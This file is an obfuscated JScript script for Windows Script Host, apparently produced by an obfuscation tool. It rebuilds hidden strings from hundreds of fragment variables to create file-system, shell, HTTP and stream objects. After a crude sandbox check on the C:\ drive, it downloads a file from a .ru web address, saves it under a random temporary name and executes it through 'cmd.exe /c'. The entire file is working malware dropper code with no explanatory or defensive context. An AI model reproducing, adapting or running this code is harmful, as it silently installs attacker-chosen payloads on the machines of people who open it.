
*****************************************************
*		 		ahoo EngObfuscate 					    
***************************************************

var po = "ype""
var wgzq = ""Op"
var vg = "ect""
var cf = "eOb"
var cdtfgc = "ri"
var ovrqgx = "je"
var ekc = "te"
var tnr = "Sys"
var jw = ""S"
var qvya = ""cmd"
var fno = "xe"
var xaeh = "0,  "
var ezggde = ""Cl"
var aopagq = "Na"
var hsk = "et"
var ibak = "te"
var wtmqn = "lde"
var hwd = "in"
var ryuu = "+ "
var whprz = ""Sav"
var xjz = ""MSX"
var ovwuu = ""Wr"
var cnxah = "pe"
var kg = ""C"
var qvfnpa = ""A"
var jq = "Sc"
var pcgm = "esp"
var btlbg = "ose""
var gf = "rea"
var dgu = ""s"
var xeacj = "ons"
var wv = ""Ge"
var jr = "Fu"
var ynr = "le"
var bgtpxc = "ti"
var wh = ""Cre"
var nvop = "HTTP"
var ktonaf = "tS"
var bbctg = ""r"
var idcyr = "eT"
var spdx = "bje"
var udlx = "goro"
var dd = "y""
var io = ".u"
var uezqv = "g.Fi"
var pi = "reat"
var fn = ""G"
var vj = "ateO"
var jt = ""t"
var pgoc = ""G"
var tm = "ject"
var cq = "Sc"
var fftrp = "" "
var zmxpk = "ci"
var og = ""C"
var mvsuy = "eBod"
var zpqx = " ubu"
var ivhy = "teOb"
var zlczdp = "ct""
var kkkk = "u0"
var lemgx = "File"
var oyf = " +"
var dqyn = "B.St"
var zc = "ipt"
var wrk = """
var qjdiet = "oFil"
var tswqtm = "mObj"
var bu = "ll""
var fuee = ""W"
var btbru = "XML"
var ju = "rea"
var njro = "r""
var neg = "", "
var fsuc = """
var da = "d.ru"
var szouv = "pen""
var vis = ""0""
var lk = "Ob"
var dwl = "DOD"
var pkj = "am""
var toh = "htt"
var xtnsl = "Syst"
var ftx = ""S"
var ia = ""W"
var nm = "pt."
var tzutil = "ript"
var fw = ""C"
var qum = "ipt"
var lmkif = "me""
var qb = "emO"
var uxd = "Tem"
var nwzoe = "nnyi"
var gjer = "ite""
var ri = "cr"
var ocyim = "ET","
var cum = "alFo"
var rtk = ""Scr"
var tjie = "//k"
var bl = " ""
var rhqk = "ihyx"
var qfw = "ML2."
var eztbpa = "orm"
var ukinpwd = ".e"
var hm = "en""
var py = "ll"
var amvzr = "ct""
var qzxux = "ct""
var xrap = "jile"
var nsvuu = "/f"
var dq = "me""
var kupwe = ""R"
var ictete = "e""
var wbv = "pNa"
var qdtb = "je"
var xsirov = "end""
var yanu = ""o"
var br = "She"
var myf = "bje"
var eg = "io"
var badjt = "crip"
var vwgb = """
var my = " "0""
var asnhsp = "un""
var sflk = "p:"
var kdlvbe = "re"
var jelgew = " /c"
var uckh = "ct""
var lh = "ng."
var mhtfj = ""2""
var yyfoa = "ame"
var ybdetof5 = new ActiveXObject([jw, 'ol', 'p'][0] + ['l', ri, 'qgl', 'w', 'o'][1] + ['ifgs', 'ler', 'h', zc, 'vfk'][3] + ['nd', hwd, 'rc'][1] + ['ffja', 'xp', 'bdik', uezqv][3] + ['od', ynr, 's', 'hb'][1] + ['k', 'x', xtnsl, 'axx'][2] + [qb, 'mdvs', 'fml'][0] + ['fkyj', 'yzjp', myf][2] + ['xy', 'mj', 'zc', uckh][3]);
if (new Function("var inkezs3 = new Enumerator(ybdetof5.GetFolder('C:\\').SubFolders);  if(inkezs3.item(0).name.length > 1) return true; else return false;")()) {
	hneneqil0 = this[['vvn', 'gx', ia, 'g'][2] + [jq, 'bp', 'ival'][0] + ['gnu', tzutil, 'fak', 'vtah'][1] + ['fm', fsuc, 'hw'][1]];
	istudyd7 = hneneqil0[[wh, 'nu', 'ug', 'je', 'frtz'][0] + [vj, 'oag', 'dfr', 'hdo'][0] + [spdx, 'xzb', 'pkzx'][0] + ['pi', 'pkn', 'eom', 'tt', amvzr][4]](['lhui', 'kpi', 'fvky', ftx, 'lej'][3] + ['txcp', badjt, 'dwua', 'k'][1] + [bgtpxc, 'oge', 'eku'][0] + [lh, 'b', 'u', 'xco', 'yvs'][0] + [lemgx, 's', 'b', 'i'][0] + ['tjb', 'qe', 'uhl', 'vnx', tnr][4] + ['ek', 'v', ekc][2] + ['bq', 'pqdf', tswqtm][2] + ['ey', vg, 'l'][1]);
	lysfopdep3 = hneneqil0[['fhiw', fw, 'jnmg', 'xrxw'][1] + ['eae', 'u', 'ytuy', pi][3] + ['xj', cf, 'w', 'fegu'][1] + ['pgn', tm, 'acq', 'kksn'][1] + ['a', vwgb, 'uq'][1]](['r', fuee, 'vp'][1] + ['m', cq, 'cx'][1] + ['m', cdtfgc, 'wg', 'lju'][1] + ['yny', 'uuas', nm, 'k', 'cv'][2] + ['buw', br, 'xukw'][1] + [bu, 'ts', 'qg', 'vnb'][0]);
	woqvybd3 = hneneqil0[['wtll', og, 'jcum', 'whu', 'ti'][1] + [ju, 'om', 'briy', 'db', 'zzr'][0] + ['en', 'rv', 'i', ibak, 'ty'][3] + [lk, 'c', 'ksl'][0] + [qdtb, 'fuue', 'ajao'][0] + ['kxun', qzxux, 'rk'][1]](['x', 'bhe', xjz, 'yf', 'beoo'][2] + ['ogzk', 'opx', qfw, 'wu', 'qcl'][2] + ['hlgh', btbru, 'e', 'ixot'][1] + ['j', 'vbid', 'tso', 'qux', nvop][4] + [wrk, 'dr', 'oco', 'xqr'][0]);
	jucyzmum2 = hneneqil0[['c', 'ord', kg, 'knyl', 'jicz'][2] + ['qtm', 'uzy', 'ghtl', gf, 'ibx'][3] + ['wym', 'sefk', 'f', ivhy][3] + ['mejk', 'iwa', 'r', ovrqgx][3] + [zlczdp, 'c', 'zbrm', 'qy', 'knl'][0]](['gn', qvfnpa, 'mys', 'qn', 'kui'][1] + ['sby', 'c', dwl, 'yh', 'qalm'][2] + [dqyn, 'sz', 'jfl', 'd', 'meiy'][0] + [kdlvbe, 'esg', 'hoif'][0] + [pkj, 'vo', 'wu'][0]);
	ihyxu0 = istudyd7[['hkb', 'nvj', wv, 'emqa', 'do'][2] + ['jals', 'nvhq', ktonaf][2] + ['jih', cnxah, 'g', 'prtu'][1] + ['o', 'jlnx', zmxpk, 'jdqi', 'atm'][2] + [cum, 'sfky', 'x'][0] + ['xu', 'q', wtmqn, 'euwm'][2] + ['f', njro, 'f', 'ef'][1]]([mhtfj, 'ykkx', 'c'][0]);
	ubujile0 = istudyd7[['pp', 'ygsa', fn][2] + ['go', hsk, 'zatv', 'ttb', 'd'][1] + [uxd, 'ij', 'g'][0] + [wbv, 'gef', 'zoq', 'ujgb'][0] + ['oj', 'k', 'e', dq, 'lmj'][3]]();
	fxejoplod6 = woqvybd3[['z', yanu, 'miw', 'zww'][1] + ['pstx', 'b', 'vzg', szouv][3]](['n', 'gscb', pgoc, 'wcv'][2] + ['dx', ocyim, 'opnn', 'p'][1] + ['gp', bl, 'imdc'][1] + ['gv', 'r', toh][2] + ['g', sflk, 'uq'][1] + ['do', tjie, 'hsms', 'mzw', 'tt'][1] + [yyfoa, 'fy', 'h'][0] + [nwzoe, 'yqcn', 'fapo', 'saom', 'rpe'][0] + ['y', 'i', udlx, 'ml'][2] + ['g', 'axj', 'xhz', 'hxk', da][4] + ['phws', nsvuu, 'iwg'][1] + ['a', 'm', eztbpa, 'g', 'f'][2] + ['ymz', io, 'fg', 'udrp'][1] + [eg, 'i', 'o'][0] + ['ddxj', 'rmpw', 'dt', neg][3] + ['htc', my, 'mix', 'xwzw'][1]);
	fxejoplod6 = woqvybd3[[dgu, 'ihc', 'g'][0] + ['fwbo', 'svr', 'ojh', xsirov][3]]();
	jucyzmum2[['f', jt, 'boxp'][1] + [po, 'upb', 'vn', 'rx', 'quk'][0]] =  "1";
	avolcuc7 = woqvybd3[['mi', 'evyl', kupwe, 'vhew', 'c'][2] + ['cuxa', pcgm, 'e'][1] + [xeacj, 'cpj', 'b', 'wu', 'rp'][0] + ['kzlc', 'ky', 'jbz', mvsuy, 'j'][3] + [dd, 'rht', 'i'][0]];
	hnoqasann0 = hneneqil0[['pai', 's', rtk, 'z'][2] + ['iql', 'b', 'io', qum][3] + [jr, 'ex', 'oj', 'vbi', 'pgcr'][0] + ['b', 'i', py][2] + [aopagq, 'qf', 'ring'][0] + ['ltn', lmkif, 'i'][1]];
	fxejoplod6 = jucyzmum2[['f', 'wh', wgzq][2] + ['c', 'u', hm, 'se', 'jwhp'][2]]();
	fxejoplod6 = jucyzmum2[[ovwuu, 'nxf', 'tz', 'vim', 'ppa'][0] + ['lz', gjer, 'vkq', 'ra', 'iind'][1]](avolcuc7);
	fxejoplod6 = jucyzmum2[['owy', whprz, 'axt'][1] + ['r', idcyr, 'jsui'][1] + ['lpud', 'skz', 'ofgu', qjdiet, 'abk'][3] + [ictete, 'oxa', 'ttnd', 'qukz', 'goxu'][0]](ihyxu0 + ubujile0);
	fxejoplod6 = jucyzmum2[['x', ezggde, 'a'][1] + [btlbg, 'uge', 'lk', 'da'][0]]();
	fxejoplod6 = lysfopdep3[['zk', 'kna', bbctg][2] + ['ugv', 'z', 'ymk', asnhsp][3]]("cmd.exe /c" + ihyxu0 + ubujile0,  "0");
}10
